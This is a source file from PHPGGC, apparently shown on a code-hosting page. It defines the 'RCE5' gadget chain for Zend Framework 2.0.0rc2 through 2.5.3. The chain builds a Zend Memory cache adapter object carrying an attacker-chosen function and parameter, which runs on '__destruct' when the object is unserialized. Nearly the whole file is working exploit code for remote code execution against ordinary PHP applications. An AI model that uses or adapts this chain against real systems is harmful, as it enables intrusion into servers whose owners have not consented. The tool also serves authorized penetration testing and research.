Codebase list phpggc / 53b00efc-9205-491f-89cb-bf3a852e8a9d/upstream/0.20221114 gadgetchains / ZendFramework / RCE / 5 / chain.php
53b00efc-9205-491f-89cb-bf3a852e8a9d/upstream/0.20221114

Tree @53b00efc-9205-491f-89cb-bf3a852e8a9d/upstream/0.20221114 (Download .tar.gz)

chain.php @53b00efc-9205-491f-89cb-bf3a852e8a9d/upstream/0.20221114raw · history · blame

<?php

namespace GadgetChain\ZendFramework;

class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '2.0.0rc2 <= 2.5.3';
    public static $vector = '__destruct';
    public static $author = 'CyanM0un';

    public function generate(array $parameters)
    {
        $function = $parameters["function"];
        $parameter = $parameters["parameter"];

        return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter);
    }
}